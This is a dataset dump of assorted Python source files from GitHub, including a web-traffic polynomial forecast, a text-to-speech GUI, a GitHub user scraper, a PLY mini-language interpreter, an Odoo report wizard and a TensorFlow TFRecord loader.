Value for both EVERY and AT are not allowed,\" \\\n \" it should be either one.\"\nERR_MSG_TIME_UNIT_EMPTY = \"(X) At least one Time Unit should be present.\"\n# messages > Audit\n# messages > Audit > operation\nOPERATION_CONFIGURATION = \"Configuration\"\nOPERATION_CREATE = \"Create\"\nOPERATION_UPDATE = \"Update\"\nOPERATION_DOWNLOAD = \"Download\"\nOPERATION_UPLOAD = \"Upload\"\nOPERATION_FILE_DELETE = \"File-Delete\"\nOPERATION_FILE_TRANSFER = \"File-Transfer\"\nOPERATION_NOTIFICATION = \"Notification\"\nOPERATION_SCHEDULE = \"Scheduler\"\nOPERATION_START_JOBS = \"Start-Jobs\"\nOPERATION_SHUTDOWN = \"Shutdown\"\n\n# messages > Audit > status\nSTATUS_LOADED = \"Loaded\"\nSTATUS_LOADING = \"Loading\"\nSTATUS_INVALID = \"Invalid\"\nSTATUS_PROCESSING = \"Processing\"\nSTATUS_COMPLETE = \"Complete\"\nSTATUS_SCHEDULING = \"Scheduling\"\nSTATUS_SCHEDULED = \"Scheduled\"\nSTATUS_STARTING = \"Starting\"\nSTATUS_STARTED = \"Started\"\nSTATUS_WAITING = \"Waiting\"\nSTATUS_INTERRUPTED = \"Interrupted\"\n\n# default configs\nDEFAULT_SCHEDULER_ACTION = \"create\"\nDEFAULT_PULSE = 5\nDEFAULT_SFTP_PORT = 22\n\n# constants\nC_TIME_PARTS = {\"hour\", \"minute\", \"second\"}\nCREATE = 'CREATE'\nUPDATE = 'UPDATE'\n\n# email notifier\nSUBJECT = \"Subject\"\nFROM = \"From\"\nTO = \"To\"\nDATE = \"Date\"\nCONTENT_DISPOSITION_K = \"Content-Disposition\"\nCONTENT_DISPOSITION_V = 'attachment; filename=\"%s\"'\n\nSECOND = 'second'\nSECONDS = 'seconds'\nMINUTE = 'minute'\nMINUTES = 'minutes'\nHOUR = 'hour'\nHOURS = 'hours'\n\nDAY = 'day'\n\nMONDAY = 'monday'\nTUESDAY = 'tuesday'\nWEDNESDAY = 'wednesday'\nTHURSDAY = 'thursday'\nFRIDAY = 'friday'\nSATURDAY = 'saturday'\nSUNDAY = 'sunday'\n","repo_name":"adityapant1286/Scheduler","sub_path":"Scheduler/utils/Constants.py","file_name":"Constants.py","file_ext":"py","file_size_in_byte":5038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"17525800791","text":"# case 01 Pcn10 假想的互联网公司访问量预测模型, 多项式拟合\n\nimport os\nimport scipy as sp\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import fsolve\n\n# 案例1\n# 互联网公司MLAAS,通过HTTP向用户推销机器学习算法服务,提供优质服务需要更好的基础设施。\n# 基础设施多了会浪费钱,少了服务质量就不能保证会导致赔钱。\n# 问题:何时会达到基础设施的服务极限,目前估计的极限是: 100000请求/小时\n# 源数据:../data/web_traffic.tsv: 小时, 访问量\n\n# all examples will have three classes in this file\ncolors = ['g', 'k', 'b', 'm', 'r']\nlinestyles = ['-', '-.', '--', ':', '-']\n\n\n# 公共绘图函数\ndef plot_models(x, y, models, fname, mx=None, ymax=None, xmin=None):\n plt.clf()\n plt.scatter(x, y, s=10)\n plt.title(\"Web traffic over the last month\")\n plt.xlabel(\"Time\")\n plt.ylabel(\"Hits/hour\")\n plt.xticks([w * 7 * 24 for w in range(10)], ['week %i' % w for w in range(10)])\n\n if models:\n if mx is None:\n mx = sp.linspace(0, x[-1], 1000)\n for model, style, color in zip(models, linestyles, colors):\n # print \"Model:\",model\n # print \"Coeffs:\",model.coeffs\n plt.plot(mx, model(mx), linestyle=style, linewidth=2, c=color)\n\n plt.legend([\"d=%i\" % m.order for m in models], loc=\"upper left\")\n\n plt.autoscale(tight=True)\n plt.ylim(ymin=0)\n if ymax:\n plt.ylim(ymax=ymax)\n if xmin:\n plt.xlim(xmin=xmin)\n plt.grid(True, linestyle='-', color='0.75')\n plt.savefig(fname)\n\n\n# 误差计算函数: 对于一个训练好的模型f,按照如下公式计算其误差,f(x)表示使用模型后的结果, sp.sum((f(x) - y) ** 2) 为所有误差平方和\n# f(x): scipy提供的向量化函数\ndef error(f, x, y):\n return sp.sum((f(x) - y) ** 2)\n\n\n# 0. 
加载数据, 初始化向量\ndata_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"..\", \"data\")\ndata = sp.genfromtxt(os.path.join(data_dir, \"web_traffic.tsv\"), delimiter=\"\\t\")\nprint(data[:10])\nx = data[:, 0] # 小时信息\ny = data[:, 1] # 某个小时的Web访问数\nprint(\"Number of invalid entries:\", sp.sum(sp.isnan(y))) # 无效数据\n\n# 1. 去掉无效数据后,绘制当前数据的图形\nx = x[~sp.isnan(y)] # 只取合法数据\ny = y[~sp.isnan(y)] # 只取合法数据\nplot_models(x, y, None, os.path.join(\"..\", \"1400_01_01.png\"))\n\n# 2. 创建模型,做1阶、2阶、3阶、10阶、100阶拟合并绘图\nfp1, res, rank, sv, rcond = sp.polyfit(x, y, 1, full=True) # fp1 为模型参数\nprint(\"Model parameters: %s\" % fp1)\nprint(\"Error of the model:\", res)\nf1 = sp.poly1d(fp1)\nf2 = sp.poly1d(sp.polyfit(x, y, 2))\nf3 = sp.poly1d(sp.polyfit(x, y, 3))\nf10 = sp.poly1d(sp.polyfit(x, y, 10))\nf100 = sp.poly1d(sp.polyfit(x, y, 100))\nplot_models(x, y, [f1], os.path.join(\"..\", \"1400_01_02.png\"))\nplot_models(x, y, [f1, f2], os.path.join(\"..\", \"1400_01_03.png\"))\nplot_models(x, y, [f1, f2, f3, f10, f100], os.path.join(\"..\", \"1400_01_04.png\"))\n\n# 3. 依据已有数据在3.5周左右出现大的拐点进行调整并设计模型\ninflection = int(3.5 * 7 * 24)\nxa = x[:inflection]\nya = y[:inflection]\nxb = x[inflection:]\nyb = y[inflection:]\nfa = sp.poly1d(sp.polyfit(xa, ya, 1))\nfb = sp.poly1d(sp.polyfit(xb, yb, 1))\nplot_models(x, y, [fa, fb], os.path.join(\"..\", \"1400_01_05.png\")) # 相比其他复查模型,最后一周更符合该直线模型,更符合未来数据\n\nprint(\"Errors for the complete data set:\")\nfor f in [f1, f2, f3, f10, f100]:\n print(\"Error d=%i: %f\" % (f.order, error(f, x, y)))\n\nprint(\"Errors for only the time before inflection point\")\nfor f in [f1, f2, f3, f10, f100]:\n print(\"Error d=%i: %f\" % (f.order, error(f, xa, ya)))\n\nprint(\"Errors for only the time after inflection point\")\nfor f in [f1, f2, f3, f10, f100]:\n print(\"Error d=%i: %f\" % (f.order, error(f, xb, yb)))\n\nprint(\"Error inflection=%f\" % (error(fa, xa, ya) + error(fb, xb, yb)))\n\n# 4. 预测 extrapolating into the future, 对于10阶、100阶两种情况从图中看出及预测效果非常差(过拟合导致)\nplot_models(\n x, y, [f1, f2, f3, f10, f100], os.path.join(\"..\", \"1400_01_06.png\"),\n mx=sp.linspace(0 * 7 * 24, 6 * 7 * 24, 100),\n ymax=10000, xmin=0 * 7 * 24)\n\n# 5. 仅仅用拐点后的数据做模型训练\nprint(\"Trained only on data after inflection point\")\nfb1 = fb\nfb2 = sp.poly1d(sp.polyfit(xb, yb, 2))\nfb3 = sp.poly1d(sp.polyfit(xb, yb, 3))\nfb10 = sp.poly1d(sp.polyfit(xb, yb, 10))\nfb100 = sp.poly1d(sp.polyfit(xb, yb, 100))\n\nprint(\"Errors for only the time after inflection point\")\nfor f in [fb1, fb2, fb3, fb10, fb100]:\n print(\"Error d=%i: %f\" % (f.order, error(f, xb, yb)))\n\nplot_models(\n x, y, [fb1, fb2, fb3, fb10, fb100], os.path.join(\"..\", \"1400_01_07.png\"),\n mx=sp.linspace(0 * 7 * 24, 6 * 7 * 24, 100),\n ymax=10000, xmin=0 * 7 * 24)\n\n# 6. 
从给定数据中分离出训练数据和测试数据, separating training from testing data\nfrac = 0.3\nsplit_idx = int(frac * len(xb))\nshuffled = sp.random.permutation(list(range(len(xb))))\ntest = sorted(shuffled[:split_idx])\ntrain = sorted(shuffled[split_idx:])\nfbt1 = sp.poly1d(sp.polyfit(xb[train], yb[train], 1))\nfbt2 = sp.poly1d(sp.polyfit(xb[train], yb[train], 2))\nfbt3 = sp.poly1d(sp.polyfit(xb[train], yb[train], 3))\nfbt10 = sp.poly1d(sp.polyfit(xb[train], yb[train], 10))\nfbt100 = sp.poly1d(sp.polyfit(xb[train], yb[train], 100))\n\nprint(\"Test errors for only the time after inflection point\")\nfor f in [fbt1, fbt2, fbt3, fbt10, fbt100]:\n print(\"Error d=%i: %f\" % (f.order, error(f, xb[test], yb[test])))\n\nplot_models(\n x, y, [fbt1, fbt2, fbt3, fbt10, fbt100], os.path.join(\"..\", \"1400_01_08.png\"), # 该图具有很大随机性, 取决于shuffled\n mx=sp.linspace(0 * 7 * 24, 6 * 7 * 24, 100),\n ymax=10000, xmin=0 * 7 * 24)\n\n# 7. 通过比较,fbt2的误差最小,选定fbt2作为我们的模型,对未来进行预测,看访问量到达100000会在什么时间点发生\nprint(fbt2)\nprint(fbt2 - 100000)\nreached_max = fsolve(fbt2 - 100000, 800) / (7 * 24)\nprint(\"100,000 hits/hour expected at week %f\" % reached_max[0])\n","repo_name":"radiumweilei/building-machine-learning-systems-with-python","sub_path":"1400OS_01_Codes/code/analyze_webstats.py","file_name":"analyze_webstats.py","file_ext":"py","file_size_in_byte":6137,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"16409187060","text":"from tkinter import *\r\nimport tkinter.messagebox as msgbox\r\nimport tkinter.filedialog as filedlg\r\nimport os\r\nimport pyttsx3\r\nfrom pydub import AudioSegment\r\nimport threading\r\n\r\ntxtfile = \"\"\r\nwindow = Tk()\r\npathlabel = Label(window, text=\"...\")\r\n\r\n'''\r\nMP3转换接口:\r\nuse_by_txt(使用一个txt所在的地址直接调用,然后生成txt对应的MP3文件)\r\nuse_by_identity是一个独立程序,如果你在当前窗口调用,调用前记得注释掉main\r\n'''\r\n\r\n\r\n\r\n\r\ndef fileFunc():\r\n default_dir = \"文件路径\"\r\n global txtfile\r\n global pathlabel\r\n txtfile = filedlg.askopenfilename(title=\"选择文件\", initialdir=(os.path.expanduser(default_dir)))\r\n (path, fname) = os.path.split(txtfile)\r\n pathlabel[\"text\"] = fname\r\n\r\ndef converThreadFunc(content):\r\n outfile = \"out.aiff\"\r\n tts = pyttsx3.init()\r\n tts.save_to_file(content, outfile)\r\n tts.runAndWait()\r\n\r\ndef convertFunc():\r\n if len(txtfile) == 0:\r\n msgbox.showinfo(\"提示\", \"请先选择文本文件\")\r\n return\r\n content = open(txtfile, \"r\",encoding='ansi').read()\r\n if len(content)==0:\r\n msgbox.showinfo(\"提示\", \"文本文件没有内容,转换终止,不输出语音文件\")\r\n return\r\n t1 = threading.Thread(target=converThreadFunc, args=(content,))\r\n t1.start()\r\n t1.join()\r\n outfile = \"out.aiff\"\r\n AudioSegment.from_file(outfile).export(\"out.mp3\", format=\"mp3\")\r\n msgbox.showinfo(\"提示\", \"转换成功,程序目录下的out.mp3就是最终的语音文件:%s\" % os.getcwd())\r\n os.system(\"open '%s'\" % os.getcwd())\r\n\r\ndef use_by_identity():\r\n window.title(\"TTS-文本转换语音\")\r\n window.geometry(\"320x320+100+100\")\r\n filebtn = Button(window, text=\"选择文本文件\", command=fileFunc)\r\n convertbtn = Button(window, text=\"转换成语音\", command=convertFunc)\r\n filebtn.place(x=10, y=10)\r\n pathlabel.place(x=10, y=40)\r\n convertbtn.place(x=10, y=80)\r\n window.mainloop()\r\n\r\ndef use_by_txt(txtpath):\r\n if len(txtpath) == 0:\r\n msgbox.showinfo(\"提示\", \"请先选择文本文件\")\r\n return\r\n content = open(txtpath, \"r\",encoding='ansi').read()\r\n if len(content)==0:\r\n msgbox.showinfo(\"提示\", \"文本文件没有内容,转换终止,不输出语音文件\")\r\n return\r\n converThreadFunc(content)\r\n outfile = \"out.aiff\"\r\n 
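As a compact, self-contained illustration of the fit-and-compare loop used in the web-traffic analysis above (synthetic data; np.polyfit/np.poly1d stand in for the legacy scipy aliases sp.polyfit/sp.poly1d used in the record):

import numpy as np

rng = np.random.default_rng(0)
x = np.linspace(0, 10, 50)
y = 3 * x + 5 + rng.normal(scale=2.0, size=x.size)  # noisy straight line

def sq_error(f, x, y):
    # Same criterion as error() above: sum of squared residuals.
    return np.sum((f(x) - y) ** 2)

for degree in (1, 2, 3, 10):
    f = np.poly1d(np.polyfit(x, y, degree))
    print(degree, sq_error(f, x, y))  # error shrinks as degree grows: beware overfitting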
AudioSegment.from_file(outfile).export(\"tlj.mp3\", format=\"mp3\")\r\n #msgbox.showinfo(\"提示\", \"转换成功,程序目录下的tlj.mp3就是最终的语音文件:%s\" % os.getcwd())\r\n#use_by_identity()\r\n#if __name__==\"__main__\":\r\n #main()","repo_name":"masterfzb/AIreader","sub_path":"use_to_wave.py","file_name":"use_to_wave.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"73372248507","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n# @Date : Apr-12-20 07:36\r\n# @Author : Your Name (you@example.org)\r\n# @Link : http://example.org\r\n\r\nimport nonebot\r\nfrom nonebot import on_command, CommandSession\r\n\r\n\r\n@on_command('info', aliases=(\"信息\"))\r\nasync def info(session: CommandSession):\r\n bot = session.bot\r\n bot = nonebot.get_bot()\r\n stripped_arg = session.current_arg_text.strip()\r\n\r\n message = \"我是布宝,真正懂你的崩坏3机器人。\"\r\n\r\n await session.send(message)\r\n","repo_name":"KellyHwong/bronya-bot","sub_path":"bronya/plugins/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"1293603691","text":"import numpy as np\nimport onnx\n\nfrom tests.tools import expect\n\n\nclass Det:\n @staticmethod\n def export_2d(): # type: () -> None\n node = onnx.helper.make_node(\n 'Det',\n inputs=['x'],\n outputs=['y'],\n )\n\n x = np.arange(4).reshape(2, 2).astype(np.float32)\n y = np.linalg.det(x) # expect -2\n expect(node, inputs=[x], outputs=[y], name='test_det_2d')\n\n @staticmethod\n def export_nd(): # type: () -> None\n node = onnx.helper.make_node(\n 'Det',\n inputs=['x'],\n outputs=['y'],\n )\n\n x = np.array([[[1, 2], [3, 4]], [[1, 2], [2, 1]], [[1, 3], [3, 1]]]).astype(\n np.float32\n )\n y = np.linalg.det(x) # expect array([-2., -3., -8.])\n expect(node, inputs=[x], outputs=[y], name='test_det_nd')\n\n\nif __name__ == '__main__':\n Det.export_2d()\n Det.export_nd()\n","repo_name":"gglin001/onnx-jax","sub_path":"tests/node/test_det.py","file_name":"test_det.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"6"} +{"seq_id":"37290621405","text":"import logging\nimport sys\n\n\ndef config(logger=None,\n name=None,\n level=logging.INFO,\n format=\"[%(asctime)s]:%(levelname)s:%(name)s:%(message)s\",\n propagate=True):\n if not logger or isinstance(logger, str):\n logger = logging.getLogger(logger)\n set_logger_level(logger=logger, level=level)\n if propagate is not None:\n logger.propagate = propagate\n if isinstance(name, str):\n logger.name = name\n if format is not None:\n if not logger.handlers:\n log_handler = logging.StreamHandler(sys.stderr)\n logger.addHandler(log_handler)\n for log_handler in logger.handlers:\n log_handler.setFormatter(logging.Formatter(format, None))\n\n\ndef set_logger_level(logger=None, level=logging.INFO):\n if not logger:\n logger = logging.getLogger()\n elif isinstance(logger, str):\n logger = logger.getLogger(logger)\n logger.setLevel(get_logging_level(level))\n\n\ndef get_logging_level(level):\n if isinstance(level, int):\n logging_level = level\n else:\n logging_level = logging.getLevelName(level)\n return 
logging_level\n","repo_name":"miacro/pyconfigmanager","sub_path":"pyconfigmanager/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"39582872745","text":"# Members: Liming Zheng, Juntong liu, Pengkai Fang\n\n# In the user.py, it scrape the user page content\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport json\nimport os\nimport csv\nimport pandas as pd\n\n\nclass User:\n def __init__(self, users):\n # user list with repeated entries\n self.__users = users\n # scraped users information\n self.users = {}\n\n @staticmethod\n def __user_has_twitter(user):\n if requests.get('https://twitter.com/' + user).status_code == 200:\n return 1\n else:\n return 0\n\n def to_CSV(self):\n # write header\n filename = os.path.join('users.csv')\n if not os.path.isfile(filename):\n with open(filename, 'w', newline='') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=['user', 'total_pr', 'user_has_twitter', 'public_repos', 'followers', 'following', 'commit_last_year'])\n writer.writeheader()\n\n # write new entry\n with open('users.csv', 'a', newline='') as csvfile:\n writer = csv.writer(csvfile)\n for user in self.users:\n entry = list(self.users[user].values())\n entry.insert(0, user)\n writer.writerow(entry)\n\n # remove duplicated entries and keep the last\n df = pd.read_csv(filename, header=0, index_col=False)\n df.drop_duplicates(subset='user', keep='last', inplace=True)\n df.to_csv(filename, index=False)\n\n def scrape(self):\n users = set(self.__users)\n for user in users:\n print(\"scraping user\", user)\n self.users[user] = {}\n\n # PRs\n self.users[user]['total_pr'] = self.__users.count(user)\n\n # does user has twitter account\n self.users[user]['user_has_twitter'] = self.__user_has_twitter(user)\n\n # load contents\n url = 'https://api.github.com/users/' + user\n try:\n repodata = requests.get(url).text\n data = json.loads(repodata)\n except Exception as e:\n print(\"Error Occurred!\")\n exit()\n\n # set values\n self.users[user]['public_repos'] = data['public_repos']\n self.users[user]['followers'] = data['followers']\n self.users[user]['following'] = data['following']\n\n # fetch contributions number in the last year\n url = 'https://github.com/users/' + user + '/contributions'\n try:\n html_content = requests.get(url).text\n soup = BeautifulSoup(html_content, features=\"html.parser\")\n text = soup.findAll('h2', {'class': 'f4 text-normal mb-2'})[0].text\n total = int(''.join(filter(str.isdigit, text)))\n self.users[user]['commit_last_year'] = total\n except Exception as e:\n print(\"Error Occurred!\")\n exit()\n\n try:\n self.to_CSV()\n except Exception as e:\n print(\"Failed to write to CSV file!\")\n exit()\n","repo_name":"LimingZheng-NAU/INF502","sub_path":"PA2/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":3091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"3478308641","text":"# -----------------------------------------------------------------------------\n# calc.py\n#\n# Expressions arithmétiques sans variables\n# -----------------------------------------------------------------------------\nfrom genereTreeGraphviz2 import printTreeGraph\n\n# PREPARER DES INPUTS POUR LA SOUTENANCE\n\ntokens = [\n 'NUMBER', 'MINUS',\n 'PLUS', 'TIMES', 'DIVIDE',\n 'LPAREN', 'RPAREN', 'AND', 'OR',\n 'SEMICOLON',\n 'NAME', 'EQUAL',\n 'COMPARE',\n 'LACCOL', 'RACCOL',\n 
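A possible invocation of the config() helper defined in the pyconfigmanager record above. This is hypothetical usage: the import path follows the record's sub_path metadata and is an assumption, not a documented API.

import logging
from pyconfigmanager import logging as logcfg  # assumed package layout (per sub_path)

logcfg.config(name="myapp", level="DEBUG")     # string levels resolve via getLevelName
logging.getLogger().debug("handler, level and format are now set on the root logger")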
'SEPARATOR', 'QUOTE'\n]\n\n# Tokens\nt_PLUS = r'\\+'\nt_MINUS = r'-'\nt_TIMES = r'\\*'\nt_DIVIDE = r'/'\nt_LPAREN = r'\\('\nt_RPAREN = r'\\)'\nt_LACCOL = r'\\{'\nt_RACCOL = r'\\}'\nt_AND = r'&'\nt_OR = r'\\|'\nt_SEMICOLON = r';'\nt_EQUAL = r'='\nt_COMPARE = r'[<>]'\nt_SEPARATOR = r','\nt_QUOTE = r'\\\"'\n\nreserved = {\n 'print': 'PRINT',\n 'true': 'TRUE',\n 'false': 'FALSE',\n 'if': 'IF',\n 'else': 'ELSE',\n 'while': 'WHILE',\n 'for': 'FOR',\n 'function': 'FUNCTION'\n}\n\nprecedence = (\n ('left', 'PLUS', 'MINUS'),\n ('nonassoc', 'AND', 'OR', 'EQUAL', 'COMPARE'),\n ('left', 'TIMES', 'DIVIDE')\n)\n\ntokens += reserved.values()\n\nnames = {}\nfunctions = {}\nparams = {}\n\n\ndef t_NUMBER(t):\n r'\\d+'\n t.value = int(t.value)\n return t\n\n\n# Ignored characters\nt_ignore = \" \\t\"\n\n\ndef t_NAME(t):\n r'[a-zA-Z_][a-zA-Z0-9_]*'\n if t.value in reserved:\n t.type = reserved[t.value]\n return t\n\n\ndef t_newline(t):\n r'\\n+'\n t.lexer.lineno += t.value.count(\"\\n\")\n\n\ndef t_error(t):\n print(\"Illegal character '%s'\" % t.value[0])\n t.lexer.skip(1)\n\n\n# Build the lexer\nimport ply.lex as lex\n\nlex.lex()\n\n\ndef p_start(p):\n \"\"\"start : bloc\"\"\"\n p[0] = ('START', p[1])\n #printTreeGraph(p[1])\n print(p[0])\n evalInst(p[1])\n\n\ndef p_bloc(p):\n \"\"\"bloc : bloc statement SEMICOLON\n | statement SEMICOLON\"\"\"\n if p[2] == \";\":\n p[0] = ('bloc', p[1], 'empty')\n else:\n p[0] = ('bloc', p[1], p[2])\n\n\ndef p_print(p):\n \"\"\"statement : PRINT LPAREN params RPAREN\"\"\"\n p[0] = ('print', p[3])\n\n\ndef p_expression_binop_plus(p):\n \"\"\"expression : expression PLUS expression\"\"\"\n\n p[0] = ('+', p[1], p[3])\n\n\ndef p_expressionTrue(p):\n \"\"\"expression : TRUE\"\"\"\n p[0] = ('true')\n\n\ndef p_expressionFalse(p):\n \"\"\"expression : FALSE\"\"\"\n p[0] = ('false')\n\n\ndef p_name_assign(p):\n \"\"\"statement : NAME EQUAL expression\n | NAME PLUS PLUS\"\"\"\n if p[2] == \"=\":\n p[0] = ('assign', p[1], p[3])\n else:\n p[0] = ('assign', p[1], p[2], p[3])\n\n\ndef p_expression_binop_bool2(p):\n \"\"\"expression : expression COMPARE expression\"\"\"\n\n p[0] = (p[2], p[1], p[3])\n\n\ndef p_expression_binop_bool(p):\n \"\"\"expression : expression AND expression\n | expression OR expression\"\"\"\n if p[2] == '&':\n p[0] = ('and', p[1], p[3])\n else:\n p[0] = ('or', p[1], p[3])\n\n\ndef p_expression_binop_times(p):\n \"\"\"expression : expression TIMES expression\"\"\"\n p[0] = ('*', p[1], p[3])\n\n\ndef p_expression_binop_divide_and_minus(p):\n \"\"\"expression : expression MINUS expression\n\t\t\t\t | expression DIVIDE expression\"\"\"\n p[0] = (p[2], p[1], p[3])\n\n\ndef p_expression_group(p):\n \"\"\"expression : LPAREN expression RPAREN\"\"\"\n p[0] = p[2]\n\n\ndef p_condition(p):\n \"\"\"statement : IF expression LACCOL bloc RACCOL\n | IF expression LACCOL bloc RACCOL ELSE LACCOL bloc RACCOL\"\"\"\n if len(p) > 6:\n p[0] = ('if', p[2], p[4], p[8])\n else:\n p[0] = ('if', p[2], p[4])\n\n\ndef p_loop(p):\n \"\"\"statement : WHILE expression LACCOL bloc RACCOL\"\"\"\n p[0] = ('while', p[2], p[4])\n\n\ndef p_for(p):\n \"\"\"statement : FOR LPAREN statement SEMICOLON expression SEMICOLON statement RPAREN LACCOL bloc RACCOL\"\"\"\n p[0] = ('for', p[3], p[5], p[7], p[10])\n\n\ndef p_params(p):\n \"\"\"params : expression SEPARATOR params\n | expression\"\"\"\n\n if len(p) == 2:\n p[0] = ('param', p[1], 'empty')\n else:\n p[0] = ('param', p[1], p[3])\n\n\ndef p_function(p):\n \"\"\"statement : FUNCTION NAME LPAREN RPAREN LACCOL bloc RACCOL\n | FUNCTION NAME LPAREN params 
RPAREN LACCOL bloc RACCOL\"\"\"\n if len(p) == 8:\n p[0] = ('function', p[2], p[6])\n else:\n p[0] = ('function', p[2], p[4], p[7])\n\n\ndef p_expression_number(p):\n \"\"\"expression : NUMBER\"\"\"\n p[0] = p[1]\n\n\ndef p_name(p):\n \"\"\"expression : NAME\"\"\"\n p[0] = p[1]\n\n\ndef p_word(p):\n \"\"\"expression : QUOTE expression\n | NAME QUOTE\n | NAME expression\"\"\"\n\n if p[1] == '\"':\n p[0] = p[2]\n elif p[2] == '\"':\n p[0] = ('string', p[1], 'empty')\n else:\n p[0] = ('string', p[1], p[2])\n\n\ndef p_function_call(p):\n \"\"\"statement : NAME LPAREN RPAREN\n | NAME LPAREN params RPAREN\"\"\"\n if len(p) == 4:\n p[0] = ('call', p[1])\n else:\n p[0] = ('call', p[1], p[3])\n\n\ndef p_error(p):\n print(\"Syntax error at '%s'\" % p.value)\n\n\ndef evalExpr(t):\n if type(t) == int:\n return t\n elif type(t) == str:\n if t == \"true\":\n return True\n elif t == \"false\":\n return False\n else:\n return names[t]\n else:\n if t[0] == \"+\":\n return evalExpr(t[1]) + evalExpr(t[2])\n elif t[0] == \"-\":\n return evalExpr(t[1]) - evalExpr(t[2])\n elif t[0] == \"*\":\n return evalExpr(t[1]) * evalExpr(t[2])\n elif t[0] == \"/\":\n return evalExpr(t[1]) / evalExpr(t[2])\n elif t[0] == \"and\":\n return evalExpr(t[1]) and evalExpr(t[2])\n elif t[0] == \"or\":\n return evalExpr(t[1]) or evalExpr(t[2])\n elif t[0] == \">\":\n return evalExpr(t[1]) > evalExpr(t[2])\n elif t[0] == \"<\":\n return evalExpr(t[1]) < evalExpr(t[2])\n elif t[0] == \"string\":\n res = ''\n unstack_val = t\n while True:\n res += unstack_val[1]\n if unstack_val[2] == \"empty\":\n break\n else:\n res += ' '\n unstack_val = unstack_val[2]\n return res\n\n\ndef evalInst(t):\n if t[0] == \"bloc\":\n evalInst(t[1])\n evalInst(t[2])\n elif t[0] == \"print\":\n unstack_val = t[1]\n while True:\n print('calc >', str(evalExpr(unstack_val[1])))\n if unstack_val[2] == \"empty\":\n break\n else:\n unstack_val = unstack_val[2]\n elif t[0] == \"assign\":\n if len(t) == 4:\n names[t[1]] += 1\n else:\n names[t[1]] = evalExpr(t[2])\n elif t[0] == \"function\":\n if len(t) == 4:\n params[t[1]] = t[2]\n functions[t[1]] = t[3]\n else:\n functions[t[1]] = t[2]\n elif t[0] == \"call\":\n if t[1] in functions:\n if len(t) > 2:\n unstack_val = t[2]\n unstack_var = params[t[1]]\n while True:\n names[unstack_var[1]] = evalExpr(unstack_val[1])\n if unstack_val[2] == \"empty\":\n break\n else:\n unstack_val = unstack_val[2]\n unstack_var = unstack_var[2]\n evalInst(functions[t[1]])\n elif t[0] == \"if\":\n if evalExpr(t[1]):\n evalInst(t[2])\n elif len(t) > 3:\n evalInst(t[3])\n elif t[0] == \"while\":\n while evalExpr(t[1]):\n evalInst(t[2])\n elif t[0] == \"for\":\n evalInst(t[1])\n while evalExpr(t[2]):\n evalInst(t[4])\n evalInst(t[3])\n\n\nimport ply.yacc as yacc\n\nyacc.yacc()\n\nwith open(\"test/file5.txt\") as file:\n s = file.read()\n\nyacc.parse(s)\n","repo_name":"Pbonnamy/language_parser_python","sub_path":"calcBase.py","file_name":"calcBase.py","file_ext":"py","file_size_in_byte":7810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"22400866161","text":"# -*- coding: utf-8 -*-\n#################################################################################\n\nfrom odoo import models, fields, api, _\nfrom datetime import datetime, date\n\n\nclass warehouse_inventory_wizard(models.TransientModel):\n _name = \"warehouse.inventory.wizard\"\n\n company_id = fields.Many2one('res.company', string=\"Company\", default=lambda self: self.env.user.company_id.id, required=True)\n 
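To make the grammar above concrete, here is a hypothetical program in the toy language it accepts. The contents of test/file5.txt are not shown in the record, so this input is an assumed example; it exercises assignment, for, the i++ increment, comparison, if/else and print:

source = (
    'x = 0;'
    'for (i = 0; i < 3; i++) { x = x + i; };'
    'if x > 2 { print(x); } else { print(0); };'
)
# yacc.parse(source) would evaluate the program and print: calc > 3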
warehouse_ids = fields.Many2many('stock.warehouse', 'warehouse_wizard_stock_rel', string=\"Warehouse\")\n\n @api.onchange('company_id')\n def onchange_company_id(self):\n if self.company_id:\n self.warehouse_ids = False\n\n @api.multi\n def generate_pdf_report(self):\n if not self.warehouse_ids:\n warehouse_ids = self.warehouse_ids\n else:\n warehouse_ids = self.env['stock.warehouse'].search([('company_id', '=', self.company_id.id)])\n datas = {'form':\n {\n 'company_id': self.company_id.id,\n 'warehouse_ids': [y.id for y in warehouse_ids],\n 'id': self.id,\n },\n }\n return self.env.ref('sun_stock_by_warehouse.action_report_stock_inventory').report_action(self, data=datas)\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:","repo_name":"detian08/bsp_addons","sub_path":"stock/sun_stock_by_warehouse/wizard/warehouse_product_wizard.py","file_name":"warehouse_product_wizard.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"38864440882","text":"import tensorflow as tf\n\n\nclass MovieReviewDataset:\n\n def __init__(self, data_file, batch_size, perform_shuffle, bucket_width, num_buckets):\n self.data_file = data_file\n self.batch_size = batch_size\n self.perform_shuffle = perform_shuffle\n self.bucket_width = bucket_width\n self.num_buckets = num_buckets\n\n def parser(self, tfrecord):\n feature_names = ['words', 'size']\n context_features = {\n 'size': tf.FixedLenFeature([], dtype=tf.int64),\n 'label': tf.FixedLenFeature([], dtype=tf.int64)\n }\n sequence_features = {\n 'tokens': tf.FixedLenSequenceFeature([], dtype=tf.int64)\n }\n\n tfrecord_parsed = tf.parse_single_sequence_example(\n tfrecord, context_features, sequence_features)\n\n tokens = tfrecord_parsed[1]['tokens']\n label = tfrecord_parsed[0]['label']\n size = tfrecord_parsed[0]['size']\n\n return dict(zip(feature_names, 